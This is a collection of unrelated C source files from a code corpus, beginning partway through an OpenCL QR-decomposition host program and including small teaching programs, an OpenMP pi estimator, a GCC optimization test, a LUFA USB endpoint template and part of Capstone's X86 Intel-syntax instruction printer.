CL_PROGRAM_BUILD_LOG, 0, NULL, &log_size); program_log = (char*) malloc(log_size + 1); program_log[log_size] = '\0'; clGetProgramBuildInfo(program, dev, CL_PROGRAM_BUILD_LOG, log_size + 1, program_log, NULL); printf("%s\n", program_log); free(program_log); exit(1); } return program; } int main() { /* Host/device data structures */ cl_device_id device; cl_context context; cl_command_queue queue; cl_program program; cl_kernel kernel; size_t global_size, local_size; cl_int err, i, j, k, check; /* Data and buffers */ float a_mat[MATRIX_DIM][MATRIX_DIM], q_mat[MATRIX_DIM][MATRIX_DIM], r_mat[MATRIX_DIM][MATRIX_DIM], check_mat[MATRIX_DIM][MATRIX_DIM]; cl_mem a_buffer, q_buffer, p_buffer, prod_buffer; /* Initialize A matrix */ srand((unsigned int)time(0)); for(i=0; i<MATRIX_DIM; i++) { for(j=0; j<MATRIX_DIM; j++) { a_mat[i][j] = (float)rand()/RAND_MAX; check_mat[i][j] = 0.0f; } } /* Create a device and context */ device = create_device(); context = clCreateContext(NULL, 1, &device, NULL, NULL, &err); if(err < 0) { perror("Couldn't create a context"); exit(1); } /* Build the program */ program = build_program(context, device, PROGRAM_FILE); /* Create a kernel */ kernel = clCreateKernel(program, KERNEL_FUNC, &err); if(err < 0) { perror("Couldn't create a kernel"); exit(1); }; /* Create buffer */ a_buffer = clCreateBuffer(context, CL_MEM_READ_WRITE | CL_MEM_COPY_HOST_PTR, sizeof(a_mat), a_mat, &err); if(err < 0) { perror("Couldn't create a buffer"); exit(1); }; q_buffer = clCreateBuffer(context, CL_MEM_WRITE_ONLY, sizeof(q_mat), NULL, NULL); p_buffer = clCreateBuffer(context, CL_MEM_WRITE_ONLY, sizeof(q_mat), NULL, NULL); prod_buffer = clCreateBuffer(context, CL_MEM_WRITE_ONLY, sizeof(q_mat), NULL, NULL); /* Create kernel arguments */ err = clSetKernelArg(kernel, 0, MATRIX_DIM * sizeof(float), NULL); err |= clSetKernelArg(kernel, 1, sizeof(cl_mem), &a_buffer); err |= clSetKernelArg(kernel, 2, sizeof(cl_mem), &q_buffer); err |= clSetKernelArg(kernel, 3, sizeof(cl_mem), &p_buffer); err |= clSetKernelArg(kernel, 4, sizeof(cl_mem), &prod_buffer); if(err < 0) { printf("Couldn't set a kernel argument"); exit(1); }; /* Create a command queue */ queue = clCreateCommandQueue(context, device, 0, &err); if(err < 0) { perror("Couldn't create a command queue"); exit(1); }; /* Enqueue kernel */ global_size = MATRIX_DIM; local_size = MATRIX_DIM; err = clEnqueueNDRangeKernel(queue, kernel, 1, NULL, &global_size, &local_size, 0, NULL, NULL); if(err < 0) { perror("Couldn't enqueue the kernel"); exit(1); } /* Read the results */ err = clEnqueueReadBuffer(queue, q_buffer, CL_TRUE, 0, sizeof(q_mat), q_mat, 0, NULL, NULL); err |= clEnqueueReadBuffer(queue, a_buffer, CL_TRUE, 0, sizeof(r_mat), r_mat, 0, NULL, NULL); if(err < 0) { perror("Couldn't read the buffers"); exit(1); } /* Compute product of Q and R */ for(i=0; i<MATRIX_DIM; i++) { for(j=0; j<MATRIX_DIM; j++) { for(k=0; k<MATRIX_DIM; k++) { check_mat[i][j] += q_mat[i][k] * r_mat[k][j]; } } } /* Check data */ check = 1; for(i=0; i<MATRIX_DIM; i++) { for(j=0; j<MATRIX_DIM; j++) { if(fabs(a_mat[i][j] - check_mat[i][j]) > 0.01f) { check = 0; break; } } } if(check) printf("QR decomposition check succeeded.\n"); else printf("QR decomposition check failed.\n"); /* Deallocate resources */ clReleaseMemObject(a_buffer); clReleaseMemObject(q_buffer); clReleaseMemObject(p_buffer); clReleaseMemObject(prod_buffer); clReleaseKernel(kernel); clReleaseCommandQueue(queue); clReleaseProgram(program); clReleaseContext(context); return 0; }
the_stack_data/54273.c
#include <stdio.h> int main(int argc, char **argv) { int i; for(i=0;i<argc;i++) printf("arg[%d]: %s\n",i,argv[i]); }
the_stack_data/28261845.c
#include <stdio.h> #include <stdlib.h> // Prof: Bruno Monteiro // Objetivo: menu repetitivo com a estrutura: while int main() { int opcao = 1; // Inicializo com qq valor, exceto zero while(opcao != 0) { printf("Menu: \n"); printf("1 - Opcao 1 \n"); printf("2 - Opcao 2 \n"); printf("0 - sair \n\n"); printf("Digite sua opcao: "); scanf("%d", &opcao); switch (opcao) { case 1 : printf("Executando Opcao 1 ... \n"); break; case 2 : printf("Executando Opcao 2 ... \n"); break; case 0 : printf("SAINDO... \n"); break; default: printf("Opcao invalida! \n"); break; } } system("pause"); return 0; }
the_stack_data/93073.c
/*********************************************************** * Program: Final Project: Pi estimation *************************************************************/ #include <omp.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <math.h> /*------------------------------------------------------------------ * Function: toss_darts * Purpose: toss darts randomly to find out the number in circles. * Input args: total_tosses: number of tosses * Output args: circles: the total number of circles */ long long toss_darts (long long total_tosses, long long* circles){ long long i, number_in_circle = 0; double x, y; int rank = omp_get_thread_num(); int thread_count = omp_get_num_threads(); unsigned int seed = (unsigned) time(NULL); srand(seed + rank); for (i = rank; i <= total_tosses; i += thread_count) { x = rand_r(&seed)/(double)RAND_MAX; y = rand_r(&seed)/(double)RAND_MAX; if( (x*x+y*y) <= 1.0 ){ number_in_circle++; } } # pragma omp critical *circles += number_in_circle; } int main(int argc, char* argv[]){ int thread_count = strtol(argv[1], NULL, 10); long long number_of_tosses, circles; double pi_estimate; double PI25DT = 3.141592653589793238462643; /* Get input from the command line */ if (argc != 3){ printf("usage: ./ open_mpi <thread_count> <number_of_tosses> \n"); exit(-1); } else { number_of_tosses = atoi(argv[2]); } # pragma omp parallel num_threads(thread_count) toss_darts(number_of_tosses, &circles); /* Estimate PI using the formula*/ pi_estimate = (4*circles)/((double) number_of_tosses); printf("Pi is approximately %.16f, Error is %.16f\n", pi_estimate, fabs(pi_estimate - PI25DT)); return 0; }/* main */
the_stack_data/12636543.c
#include<stdio.h> int main(){ char p[]="hdmtp"; //----> ***hardcoded variable*** char temp; int len=0; while (p[len]!='\0') { len++; } for (int i = 0; i <= (len/2 - 1); i++) { temp = p[i]; p[i] = p[len-1-i]; p[len-1-i] = temp; } printf("%s", p); return 0; }
the_stack_data/353894.c
/* PR tree-optimization/54810 */ /* { dg-do link } */ /* { dg-options "-O2 -fdump-tree-vrp1" } */ extern void link_error (void); #define T(n, ntype, wtype) \ void \ f##n (wtype s) \ { \ if ((ntype) s == 0) \ return; \ if (s == 0) \ link_error (); \ } T(1, unsigned char, unsigned char) T(2, unsigned char, unsigned short) T(3, unsigned char, unsigned int) T(4, unsigned char, unsigned long int) T(5, unsigned char, unsigned long long int) T(6, unsigned short int, unsigned short int) T(7, unsigned short int, unsigned int) T(8, unsigned short int, unsigned long int) T(9, unsigned short int, unsigned long long int) T(10, unsigned int, unsigned int) T(11, unsigned int, unsigned long int) T(12, unsigned int, unsigned long long int) T(13, unsigned long int, unsigned long int) T(14, unsigned long int, unsigned long long int) T(15, unsigned long long int, unsigned long long int) int main () { return 0; } /* { dg-final { scan-tree-dump-not "link_error" "vrp1"} } */
the_stack_data/156394279.c
/* LUFA Library Copyright (C) Dean Camera, 2013. dean [at] fourwalledcubicle [dot] com www.lufa-lib.org */ /* Copyright 2013 Dean Camera (dean [at] fourwalledcubicle [dot] com) Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that the copyright notice and this permission notice and warranty disclaimer appear in supporting documentation, and that the name of the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission. The author disclaims all warranties with regard to this software, including all implied warranties of merchantability and fitness. In no event shall the author be liable for any special, indirect or consequential damages or any damages whatsoever resulting from loss of use, data or profits, whether in an action of contract, negligence or other tortious action, arising out of or in connection with the use or performance of this software. */ #if defined(TEMPLATE_FUNC_NAME) uint8_t TEMPLATE_FUNC_NAME (const void* const Buffer, uint16_t Length) { uint8_t* DataStream = ((uint8_t*)Buffer + TEMPLATE_BUFFER_OFFSET(Length)); bool LastPacketFull = false; if (Length > USB_ControlRequest.wLength) Length = USB_ControlRequest.wLength; else if (!(Length)) Endpoint_ClearIN(); while (Length || LastPacketFull) { uint8_t USB_DeviceState_LCL = USB_DeviceState; if (USB_DeviceState_LCL == DEVICE_STATE_Unattached) return ENDPOINT_RWCSTREAM_DeviceDisconnected; else if (USB_DeviceState_LCL == DEVICE_STATE_Suspended) return ENDPOINT_RWCSTREAM_BusSuspended; else if (Endpoint_IsSETUPReceived()) return ENDPOINT_RWCSTREAM_HostAborted; else if (Endpoint_IsOUTReceived()) break; if (Endpoint_IsINReady()) { uint16_t BytesInEndpoint = Endpoint_BytesInEndpoint(); while (Length && (BytesInEndpoint < USB_Device_ControlEndpointSize)) { TEMPLATE_TRANSFER_BYTE(DataStream); TEMPLATE_BUFFER_MOVE(DataStream, 1); Length--; BytesInEndpoint++; } LastPacketFull = (BytesInEndpoint == USB_Device_ControlEndpointSize); Endpoint_ClearIN(); } } while (!(Endpoint_IsOUTReceived())) { uint8_t USB_DeviceState_LCL = USB_DeviceState; if (USB_DeviceState_LCL == DEVICE_STATE_Unattached) return ENDPOINT_RWCSTREAM_DeviceDisconnected; else if (USB_DeviceState_LCL == DEVICE_STATE_Suspended) return ENDPOINT_RWCSTREAM_BusSuspended; } return ENDPOINT_RWCSTREAM_NoError; } #undef TEMPLATE_BUFFER_OFFSET #undef TEMPLATE_BUFFER_MOVE #undef TEMPLATE_FUNC_NAME #undef TEMPLATE_TRANSFER_BYTE #endif
the_stack_data/176705585.c
// Compile with: gcc fileread.c -o fileread // Run with: ./fileread // Fill in the code! #include <stdio.h> #include <stdlib.h> int main(){ // A pointer to a file FILE* myFile; // We point our file pointer to a file // The filepath is relative to where we are // i.e. the './' means start searching for files here. myFile = fopen("./data.txt", "r"); // We should check if we successfully opened the file next. // Because this is a 'file pointer' we can check if the // operation was successful against NULL. if(NULL == myFile){ fprintf(stderr,"data.txt not found, did you run data.sh?"); fprintf(stderr, "note: stderr argument means we write to a special 'error' output stream."); fprintf(stderr, "Program terminating now..."); exit(1); } // If we have successfully opened our file, we can now read each line. // We will read each line, until we reach the end of the file (EOF). char buffer[255]; // At most, each line in file can be 255 characters // So we will now can each line from a file(fscanf), // and store it as a character string(%s) in buffer each iteration. while(fscanf(myFile, "%s", buffer) != EOF){ printf("Red Sox wins are: %s\n", buffer); } // Finally, we will close our file fclose(myFile); return 0; }
the_stack_data/11074132.c
//===-- X86IntelInstPrinter.cpp - Intel assembly instruction printing -----===// // // The LLVM Compiler Infrastructure // // This file is distributed under the University of Illinois Open Source // License. See LICENSE.TXT for details. // //===----------------------------------------------------------------------===// // // This file includes code for rendering MCInst instances as Intel-style // assembly. // //===----------------------------------------------------------------------===// /* Capstone Disassembly Engine */ /* By Nguyen Anh Quynh <[email protected]>, 2013-2015 */ #ifdef CAPSTONE_HAS_X86 #if defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64) #pragma warning(disable:4996) // disable MSVC's warning on strncpy() #pragma warning(disable:28719) // disable MSVC's warning on strncpy() #endif #if !defined(CAPSTONE_HAS_OSXKERNEL) #include <ctype.h> #endif #include <capstone/platform.h> #if defined(CAPSTONE_HAS_OSXKERNEL) #include <libkern/libkern.h> #else #include <stdio.h> #include <stdlib.h> #endif #include <string.h> #include "../../utils.h" #include "../../MCInst.h" #include "../../SStream.h" #include "../../MCRegisterInfo.h" #include "X86Mapping.h" #define GET_INSTRINFO_ENUM #ifdef CAPSTONE_X86_REDUCE #include "X86GenInstrInfo_reduce.inc" #else #include "X86GenInstrInfo.inc" #endif #include "X86BaseInfo.h" static void printMemReference(MCInst *MI, unsigned Op, SStream *O); static void printOperand(MCInst *MI, unsigned OpNo, SStream *O); static void set_mem_access(MCInst *MI, bool status) { if (MI->csh->detail != CS_OPT_ON) return; MI->csh->doing_mem = status; if (!status) // done, create the next operand slot MI->flat_insn->detail->x86.op_count++; } static void printopaquemem(MCInst *MI, unsigned OpNo, SStream *O) { // FIXME: do this with autogen // printf(">>> ID = %u\n", MI->flat_insn->id); switch(MI->flat_insn->id) { default: SStream_concat0(O, "ptr "); break; case X86_INS_SGDT: case X86_INS_SIDT: case X86_INS_LGDT: case X86_INS_LIDT: case X86_INS_FXRSTOR: case X86_INS_FXSAVE: case X86_INS_LJMP: case X86_INS_LCALL: // do not print "ptr" break; } switch(MI->csh->mode) { case CS_MODE_16: switch(MI->flat_insn->id) { default: MI->x86opsize = 2; break; case X86_INS_LJMP: case X86_INS_LCALL: MI->x86opsize = 4; break; case X86_INS_SGDT: case X86_INS_SIDT: case X86_INS_LGDT: case X86_INS_LIDT: MI->x86opsize = 6; break; } break; case CS_MODE_32: switch(MI->flat_insn->id) { default: MI->x86opsize = 4; break; case X86_INS_LJMP: case X86_INS_LCALL: case X86_INS_SGDT: case X86_INS_SIDT: case X86_INS_LGDT: case X86_INS_LIDT: MI->x86opsize = 6; break; } break; case CS_MODE_64: switch(MI->flat_insn->id) { default: MI->x86opsize = 8; break; case X86_INS_LJMP: case X86_INS_LCALL: case X86_INS_SGDT: case X86_INS_SIDT: case X86_INS_LGDT: case X86_INS_LIDT: MI->x86opsize = 10; break; } break; default: // never reach break; } printMemReference(MI, OpNo, O); } static void printi8mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "byte ptr "); MI->x86opsize = 1; printMemReference(MI, OpNo, O); } static void printi16mem(MCInst *MI, unsigned OpNo, SStream *O) { MI->x86opsize = 2; SStream_concat0(O, "word ptr "); printMemReference(MI, OpNo, O); } static void printi32mem(MCInst *MI, unsigned OpNo, SStream *O) { MI->x86opsize = 4; SStream_concat0(O, "dword ptr "); printMemReference(MI, OpNo, O); } static void printi64mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "qword ptr "); MI->x86opsize = 8; printMemReference(MI, OpNo, O); } static void printi128mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "xmmword ptr "); MI->x86opsize = 16; printMemReference(MI, OpNo, O); } #ifndef CAPSTONE_X86_REDUCE static void printi256mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "ymmword ptr "); MI->x86opsize = 32; printMemReference(MI, OpNo, O); } static void printi512mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "zmmword ptr "); MI->x86opsize = 64; printMemReference(MI, OpNo, O); } static void printf32mem(MCInst *MI, unsigned OpNo, SStream *O) { switch(MCInst_getOpcode(MI)) { default: SStream_concat0(O, "dword ptr "); MI->x86opsize = 4; break; case X86_FBSTPm: case X86_FBLDm: // TODO: fix this in tablegen instead SStream_concat0(O, "tbyte ptr "); MI->x86opsize = 10; break; case X86_FSTENVm: case X86_FLDENVm: // TODO: fix this in tablegen instead switch(MI->csh->mode) { default: // never reach break; case CS_MODE_16: MI->x86opsize = 14; break; case CS_MODE_32: case CS_MODE_64: MI->x86opsize = 28; break; } break; } printMemReference(MI, OpNo, O); } static void printf64mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "qword ptr "); MI->x86opsize = 8; printMemReference(MI, OpNo, O); } static void printf80mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "xword ptr "); MI->x86opsize = 10; printMemReference(MI, OpNo, O); } static void printf128mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "xmmword ptr "); MI->x86opsize = 16; printMemReference(MI, OpNo, O); } static void printf256mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "ymmword ptr "); MI->x86opsize = 32; printMemReference(MI, OpNo, O); } static void printf512mem(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "zmmword ptr "); MI->x86opsize = 64; printMemReference(MI, OpNo, O); } static void printSSECC(MCInst *MI, unsigned Op, SStream *OS) { uint8_t Imm = (uint8_t)(MCOperand_getImm(MCInst_getOperand(MI, Op)) & 7); switch (Imm) { default: break; // never reach case 0: SStream_concat0(OS, "eq"); op_addSseCC(MI, X86_SSE_CC_EQ); break; case 1: SStream_concat0(OS, "lt"); op_addSseCC(MI, X86_SSE_CC_LT); break; case 2: SStream_concat0(OS, "le"); op_addSseCC(MI, X86_SSE_CC_LE); break; case 3: SStream_concat0(OS, "unord"); op_addSseCC(MI, X86_SSE_CC_UNORD); break; case 4: SStream_concat0(OS, "neq"); op_addSseCC(MI, X86_SSE_CC_NEQ); break; case 5: SStream_concat0(OS, "nlt"); op_addSseCC(MI, X86_SSE_CC_NLT); break; case 6: SStream_concat0(OS, "nle"); op_addSseCC(MI, X86_SSE_CC_NLE); break; case 7: SStream_concat0(OS, "ord"); op_addSseCC(MI, X86_SSE_CC_ORD); break; } MI->popcode_adjust = Imm + 1; } static void printAVXCC(MCInst *MI, unsigned Op, SStream *O) { uint8_t Imm = (uint8_t)(MCOperand_getImm(MCInst_getOperand(MI, Op)) & 0x1f); switch (Imm) { default: break;//printf("Invalid avxcc argument!\n"); break; case 0: SStream_concat0(O, "eq"); op_addAvxCC(MI, X86_AVX_CC_EQ); break; case 1: SStream_concat0(O, "lt"); op_addAvxCC(MI, X86_AVX_CC_LT); break; case 2: SStream_concat0(O, "le"); op_addAvxCC(MI, X86_AVX_CC_LE); break; case 3: SStream_concat0(O, "unord"); op_addAvxCC(MI, X86_AVX_CC_UNORD); break; case 4: SStream_concat0(O, "neq"); op_addAvxCC(MI, X86_AVX_CC_NEQ); break; case 5: SStream_concat0(O, "nlt"); op_addAvxCC(MI, X86_AVX_CC_NLT); break; case 6: SStream_concat0(O, "nle"); op_addAvxCC(MI, X86_AVX_CC_NLE); break; case 7: SStream_concat0(O, "ord"); op_addAvxCC(MI, X86_AVX_CC_ORD); break; case 8: SStream_concat0(O, "eq_uq"); op_addAvxCC(MI, X86_AVX_CC_EQ_UQ); break; case 9: SStream_concat0(O, "nge"); op_addAvxCC(MI, X86_AVX_CC_NGE); break; case 0xa: SStream_concat0(O, "ngt"); op_addAvxCC(MI, X86_AVX_CC_NGT); break; case 0xb: SStream_concat0(O, "false"); op_addAvxCC(MI, X86_AVX_CC_FALSE); break; case 0xc: SStream_concat0(O, "neq_oq"); op_addAvxCC(MI, X86_AVX_CC_NEQ_OQ); break; case 0xd: SStream_concat0(O, "ge"); op_addAvxCC(MI, X86_AVX_CC_GE); break; case 0xe: SStream_concat0(O, "gt"); op_addAvxCC(MI, X86_AVX_CC_GT); break; case 0xf: SStream_concat0(O, "true"); op_addAvxCC(MI, X86_AVX_CC_TRUE); break; case 0x10: SStream_concat0(O, "eq_os"); op_addAvxCC(MI, X86_AVX_CC_EQ_OS); break; case 0x11: SStream_concat0(O, "lt_oq"); op_addAvxCC(MI, X86_AVX_CC_LT_OQ); break; case 0x12: SStream_concat0(O, "le_oq"); op_addAvxCC(MI, X86_AVX_CC_LE_OQ); break; case 0x13: SStream_concat0(O, "unord_s"); op_addAvxCC(MI, X86_AVX_CC_UNORD_S); break; case 0x14: SStream_concat0(O, "neq_us"); op_addAvxCC(MI, X86_AVX_CC_NEQ_US); break; case 0x15: SStream_concat0(O, "nlt_uq"); op_addAvxCC(MI, X86_AVX_CC_NLT_UQ); break; case 0x16: SStream_concat0(O, "nle_uq"); op_addAvxCC(MI, X86_AVX_CC_NLE_UQ); break; case 0x17: SStream_concat0(O, "ord_s"); op_addAvxCC(MI, X86_AVX_CC_ORD_S); break; case 0x18: SStream_concat0(O, "eq_us"); op_addAvxCC(MI, X86_AVX_CC_EQ_US); break; case 0x19: SStream_concat0(O, "nge_uq"); op_addAvxCC(MI, X86_AVX_CC_NGE_UQ); break; case 0x1a: SStream_concat0(O, "ngt_uq"); op_addAvxCC(MI, X86_AVX_CC_NGT_UQ); break; case 0x1b: SStream_concat0(O, "false_os"); op_addAvxCC(MI, X86_AVX_CC_FALSE_OS); break; case 0x1c: SStream_concat0(O, "neq_os"); op_addAvxCC(MI, X86_AVX_CC_NEQ_OS); break; case 0x1d: SStream_concat0(O, "ge_oq"); op_addAvxCC(MI, X86_AVX_CC_GE_OQ); break; case 0x1e: SStream_concat0(O, "gt_oq"); op_addAvxCC(MI, X86_AVX_CC_GT_OQ); break; case 0x1f: SStream_concat0(O, "true_us"); op_addAvxCC(MI, X86_AVX_CC_TRUE_US); break; } MI->popcode_adjust = Imm + 1; } static void printXOPCC(MCInst *MI, unsigned Op, SStream *O) { int64_t Imm = MCOperand_getImm(MCInst_getOperand(MI, Op)); switch (Imm) { default: // llvm_unreachable("Invalid xopcc argument!"); case 0: SStream_concat0(O, "lt"); op_addXopCC(MI, X86_XOP_CC_LT); break; case 1: SStream_concat0(O, "le"); op_addXopCC(MI, X86_XOP_CC_LE); break; case 2: SStream_concat0(O, "gt"); op_addXopCC(MI, X86_XOP_CC_GT); break; case 3: SStream_concat0(O, "ge"); op_addXopCC(MI, X86_XOP_CC_GE); break; case 4: SStream_concat0(O, "eq"); op_addXopCC(MI, X86_XOP_CC_EQ); break; case 5: SStream_concat0(O, "neq"); op_addXopCC(MI, X86_XOP_CC_NEQ); break; case 6: SStream_concat0(O, "false"); op_addXopCC(MI, X86_XOP_CC_FALSE); break; case 7: SStream_concat0(O, "true"); op_addXopCC(MI, X86_XOP_CC_TRUE); break; } } static void printRoundingControl(MCInst *MI, unsigned Op, SStream *O) { int64_t Imm = MCOperand_getImm(MCInst_getOperand(MI, Op)) & 0x3; switch (Imm) { case 0: SStream_concat0(O, "{rn-sae}"); op_addAvxSae(MI); op_addAvxRoundingMode(MI, X86_AVX_RM_RN); break; case 1: SStream_concat0(O, "{rd-sae}"); op_addAvxSae(MI); op_addAvxRoundingMode(MI, X86_AVX_RM_RD); break; case 2: SStream_concat0(O, "{ru-sae}"); op_addAvxSae(MI); op_addAvxRoundingMode(MI, X86_AVX_RM_RU); break; case 3: SStream_concat0(O, "{rz-sae}"); op_addAvxSae(MI); op_addAvxRoundingMode(MI, X86_AVX_RM_RZ); break; default: break; // never reach } } #endif static char *getRegisterName(unsigned RegNo); static void printRegName(SStream *OS, unsigned RegNo) { SStream_concat0(OS, getRegisterName(RegNo)); } // for MASM syntax, 0x123 = 123h, 0xA123 = 0A123h // this function tell us if we need to have prefix 0 in front of a number static bool need_zero_prefix(uint64_t imm) { // find the first hex letter representing imm while(imm >= 0x10) imm >>= 4; if (imm < 0xa) return false; else // this need 0 prefix return true; } static void printImm(int syntax, SStream *O, int64_t imm, bool positive) { if (positive) { // always print this number in positive form if (syntax == CS_OPT_SYNTAX_MASM) { if (imm < 0) { if (imm == 0x8000000000000000LL) // imm == -imm SStream_concat0(O, "8000000000000000h"); else if (need_zero_prefix(imm)) SStream_concat(O, "0%"PRIx64"h", imm); else SStream_concat(O, "%"PRIx64"h", imm); } else { if (imm > HEX_THRESHOLD) { if (need_zero_prefix(imm)) SStream_concat(O, "0%"PRIx64"h", imm); else SStream_concat(O, "%"PRIx64"h", imm); } else SStream_concat(O, "%"PRIu64, imm); } } else { // Intel syntax if (imm < 0) { SStream_concat(O, "0x%"PRIx64, imm); } else { if (imm > HEX_THRESHOLD) SStream_concat(O, "0x%"PRIx64, imm); else SStream_concat(O, "%"PRIu64, imm); } } } else { if (syntax == CS_OPT_SYNTAX_MASM) { if (imm < 0) { if (imm == 0x8000000000000000LL) // imm == -imm SStream_concat0(O, "8000000000000000h"); else if (imm < -HEX_THRESHOLD) { if (need_zero_prefix(imm)) SStream_concat(O, "-0%"PRIx64"h", -imm); else SStream_concat(O, "-%"PRIx64"h", -imm); } else SStream_concat(O, "-%"PRIu64, -imm); } else { if (imm > HEX_THRESHOLD) { if (need_zero_prefix(imm)) SStream_concat(O, "0%"PRIx64"h", imm); else SStream_concat(O, "%"PRIx64"h", imm); } else SStream_concat(O, "%"PRIu64, imm); } } else { // Intel syntax if (imm < 0) { if (imm == 0x8000000000000000LL) // imm == -imm SStream_concat0(O, "0x8000000000000000"); else if (imm < -HEX_THRESHOLD) SStream_concat(O, "-0x%"PRIx64, -imm); else SStream_concat(O, "-%"PRIu64, -imm); } else { if (imm > HEX_THRESHOLD) SStream_concat(O, "0x%"PRIx64, imm); else SStream_concat(O, "%"PRIu64, imm); } } } } // local printOperand, without updating public operands static void _printOperand(MCInst *MI, unsigned OpNo, SStream *O) { MCOperand *Op = MCInst_getOperand(MI, OpNo); if (MCOperand_isReg(Op)) { printRegName(O, MCOperand_getReg(Op)); } else if (MCOperand_isImm(Op)) { int64_t imm = MCOperand_getImm(Op); printImm(MI->csh->syntax, O, imm, MI->csh->imm_unsigned); } } #ifndef CAPSTONE_DIET // copy & normalize access info static void get_op_access(cs_struct *h, unsigned int id, uint8_t *access, uint64_t *eflags) { #ifndef CAPSTONE_DIET uint8_t i; uint8_t *arr = X86_get_op_access(h, id, eflags); if (!arr) { access[0] = 0; return; } // copy to access but zero out CS_AC_IGNORE for(i = 0; arr[i]; i++) { if (arr[i] != CS_AC_IGNORE) access[i] = arr[i]; else access[i] = 0; } // mark the end of array access[i] = 0; #endif } #endif static void printSrcIdx(MCInst *MI, unsigned Op, SStream *O) { MCOperand *SegReg; int reg; if (MI->csh->detail) { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_MEM; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->x86opsize; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.base = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.index = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.scale = 1; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.disp = 0; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif } SegReg = MCInst_getOperand(MI, Op+1); reg = MCOperand_getReg(SegReg); // If this has a segment register, print it. if (reg) { _printOperand(MI, Op+1, O); if (MI->csh->detail) { MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = reg; } SStream_concat0(O, ":"); } SStream_concat0(O, "["); set_mem_access(MI, true); printOperand(MI, Op, O); SStream_concat0(O, "]"); set_mem_access(MI, false); } static void printDstIdx(MCInst *MI, unsigned Op, SStream *O) { if (MI->csh->detail) { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_MEM; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->x86opsize; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.base = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.index = X86_REG_INVALID; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.scale = 1; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.disp = 0; #ifndef CAPSTONE_DIET get_op_access(MI->csh, MCInst_getOpcode(MI), access, &MI->flat_insn->detail->x86.eflags); MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].access = access[MI->flat_insn->detail->x86.op_count]; #endif } // DI accesses are always ES-based on non-64bit mode if (MI->csh->mode != CS_MODE_64) { SStream_concat(O, "es:["); if (MI->csh->detail) { MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].mem.segment = X86_REG_ES; } } else SStream_concat(O, "["); set_mem_access(MI, true); printOperand(MI, Op, O); SStream_concat0(O, "]"); set_mem_access(MI, false); } void printSrcIdx8(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "byte ptr "); MI->x86opsize = 1; printSrcIdx(MI, OpNo, O); } void printSrcIdx16(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "word ptr "); MI->x86opsize = 2; printSrcIdx(MI, OpNo, O); } void printSrcIdx32(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "dword ptr "); MI->x86opsize = 4; printSrcIdx(MI, OpNo, O); } void printSrcIdx64(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "qword ptr "); MI->x86opsize = 8; printSrcIdx(MI, OpNo, O); } void printDstIdx8(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "byte ptr "); MI->x86opsize = 1; printDstIdx(MI, OpNo, O); } void printDstIdx16(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "word ptr "); MI->x86opsize = 2; printDstIdx(MI, OpNo, O); } void printDstIdx32(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "dword ptr "); MI->x86opsize = 4; printDstIdx(MI, OpNo, O); } void printDstIdx64(MCInst *MI, unsigned OpNo, SStream *O) { SStream_concat0(O, "qword ptr "); MI->x86opsize = 8; printDstIdx(MI, OpNo, O); } static void printMemOffset(MCInst *MI, unsigned Op, SStream *O) { MCOperand *DispSpec = MCInst_getOperand(MI, Op); MCOperand *SegReg = MCInst_getOperand(MI, Op + 1); int reg; if (MI->csh->detail) { #ifndef CAPSTONE_DIET uint8_t access[6]; #endif MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].type = X86_OP_MEM; MI->flat_insn->detail->x86.operands[MI->flat_insn->detail->x86.op_count].size = MI->x86opsize; 